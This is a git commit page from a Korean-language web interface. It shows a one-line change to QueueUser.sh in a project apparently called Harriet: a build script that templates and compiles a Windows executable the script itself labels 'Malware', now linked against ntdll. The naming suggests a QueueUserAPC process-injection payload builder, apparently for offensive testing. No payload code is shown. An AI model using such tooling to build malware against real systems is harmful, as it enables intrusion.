소스 검색

Update QueueUser.sh

assume-breach 2 년 전
부모
커밋
4ab9351980
1개의 변경된 파일1개의 추가작업 그리고 1개의 파일을 삭제
  1. 1 1
      Harriet/Harriet/QueueUserAPC/QueueUser.sh

+ 1 - 1
Harriet/Harriet/QueueUserAPC/QueueUser.sh

@@ -90,7 +90,7 @@ sed -i "s/RandomC/$RandomC/g" Harriet/QueueUserAPC/Resources/template.cpp
 
 rm shell*
 echo -e ${yellow}"+++Compiling Malware+++"${clear}
-x86_64-w64-mingw32-g++ -o $MALWARE Harriet/QueueUserAPC/Resources/template.cpp -fpermissive -Wno-narrowing Harriet/Resources/resources.res -mwindows -O2 -Os >/dev/null 2>&1
+x86_64-w64-mingw32-g++ -o $MALWARE Harriet/QueueUserAPC/Resources/template.cpp -fpermissive -Wno-narrowing Harriet/Resources/resources.res -lntdll -mwindows -O2 -Os >/dev/null 2>&1
 echo ""
 sleep 2
 echo -e ${yellow}"***Malware Compiled***"${clear}